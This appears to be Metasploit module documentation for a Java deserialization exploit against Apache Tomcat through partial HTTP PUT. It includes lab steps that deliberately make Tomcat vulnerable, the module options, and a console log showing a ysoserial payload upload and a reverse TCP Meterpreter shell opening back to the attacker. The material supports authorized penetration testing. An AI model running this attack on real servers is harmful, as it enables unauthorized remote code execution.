## Vulnerable Application
This module exploits a Java deserialization vulnerability in Apache Tomcat's session restoration functionality
that can be exploited with a partial HTTP PUT request to place an attacker controlled deserialization payload in the
<tomcat_root_dir>/webapps/ROOT/ directory. For the exploit to succeed, writes must be enabled for the default servlet,
and `org.apache.catalina.session.PersistentManager` must be configured to use `org.apache.catalina.session.FileStore`.

## Setup
Download Ubuntu Server 24:
`wget https://mirror.0xem.ma/ubuntu-releases/24.04.2/ubuntu-24.04.2-live-server-amd64.iso`

Install ubuntu on your preferred hypervisor, enable SSH during installation. Reboot once installation is complete and SSH into the target.
Download Tomcat and Java:
```
wget https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.90/bin/apache-tomcat-9.0.90.zip
wget https://cdn.azul.com/zulu/bin/zulu8.80.0.17-ca-jdk8.0.422-linux_x64.tar.gz
```

Extract the JDK Archive to the appropriate directory:
```
tar -xvzf zulu8.80.0.17-ca-jdk8.0.422-linux_x64.tar.gz
sudo mkdir -p /opt/java
sudo mv zulu8.80.0.17-ca-jdk8.0.422-linux_x64 /opt/java/zulu8
```

Install `unzip` and extract Tomcat:
```
sudo apt install unzip -y
sudo unzip apache-tomcat-9.0.90.zip -d /opt/
```

Set `CATALINA_HOME` and `JAVA_HOME` also update `PATH` by adding the following to `~/.bashrc`:
```
export CATALINA_HOME=/opt/apache-tomcat-9.0.90
export JAVA_HOME=/opt/java/zulu8
export PATH=$JAVA_HOME/bin:$PATH
```

Apply changes:
```
source ~/.bashrc
```

Change Tomcat permissions:
```
sudo chown -R msfuser:msfuser /opt/apache-tomcat-9.0.90
sudo chmod -R +x /opt/apache-tomcat-9.0.90/bin
```

Edit `conf/web.xml` and update the default servlet with the following:
```
    <servlet>
        <servlet-name>default</servlet-name>
        <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
        <init-param>
            <param-name>debug</param-name>
            <param-value>0</param-value>
        </init-param>
        <init-param>
            <param-name>listings</param-name>
            <param-value>false</param-value>
        </init-param>
        <init-param>
          <param-name>readonly</param-name>
          <param-value>false</param-value>
        </init-param>
        <load-on-startup>1</load-on-startup>
    </servlet>
```

Edit `conf/content.xml` and add the following inside the pre-existing `<Context>` tags:
```
    <Manager className="org.apache.catalina.session.PersistentManager">
      <Store className="org.apache.catalina.session.FileStore" />
    </Manager>
```

Create the following directory inside the tomcat root directory:
```
mkdir -p webapps/ROOT/WEB-INF/lib
cd ./webapps/ROOT/WEB-INF/lib
```

Download the following dependencies:
```
wget https://repo1.maven.org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.jar
wget https://repo1.maven.org/maven2/commons-beanutils/commons-beanutils/1.9.4/commons-beanutils-1.9.4.jar
wget https://repo1.maven.org/maven2/commons-collections/commons-collections/3.1/commons-collections-3.1.jar
```

Start the vulnerable Tomcat instance:
```
cd /opt/apache-tomcat-9.0.90/bin
./startup.sh
```

## Options

### GADGET
The desired ysoserial gadget to use to obtain RCE.

## Verification Steps
1. Start msfconsole
2. `use multi/http/tomcat_partial_put_deserialization`
3. `set RHOST <TARGET_IP_ADDRESS>`
4. `set RPORT <TARGET_PORT>`
5. `set GADGET <YSOSERIAL_GADGET>`
6. `set LHOST eth0`
7. `check`
8. `exploit`

## Scenarios

### Apache Tomcat 9.0.90, jdk8.0.422 running on Ubuntu Server 24. Target: Linux Command

```
msf > use multi/http/tomcat_partial_put_deserialization
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
msf exploit(multi/http/tomcat_partial_put_deserialization) > set rport 8080
rport => 8080
msf exploit(multi/http/tomcat_partial_put_deserialization) > set rhost 172.16.199.130
rhost => 172.16.199.130
msf exploit(multi/http/tomcat_partial_put_deserialization) > set gadget CommonsCollections6
gadget => CommonsCollections6
msf exploit(multi/http/tomcat_partial_put_deserialization) > check
[!] This exploit may require manual cleanup of '../webapps/ROOT/YLNKdGSIcB.session' on the target
[+] 172.16.199.130:8080 - The target is vulnerable.
msf exploit(multi/http/tomcat_partial_put_deserialization) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] Utilizing CommonsCollections6 deserialization chain
[+] Uploaded ysoserial payload (imNsIsZCCC.session) via partial PUT
[*] Attempting to deserialize session file..
[+] 500 error response usually indicates success :)
[*] Sending stage (24772 bytes) to 172.16.199.130
[+] Deleted ../webapps/ROOT/pAdshcNMRO.session
[+] Deleted ../webapps/ROOT/imNsIsZCCC.session
[*] Meterpreter session 6 opened (172.16.199.1:4444 -> 172.16.199.130:44562) at 2025-04-02 13:34:50 -0700

meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer        : msfserver
OS              : Linux 6.8.0-57-generic #59-Ubuntu SMP PREEMPT_DYNAMIC Sat Mar 15 17:40:59 UTC 2025
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter >
```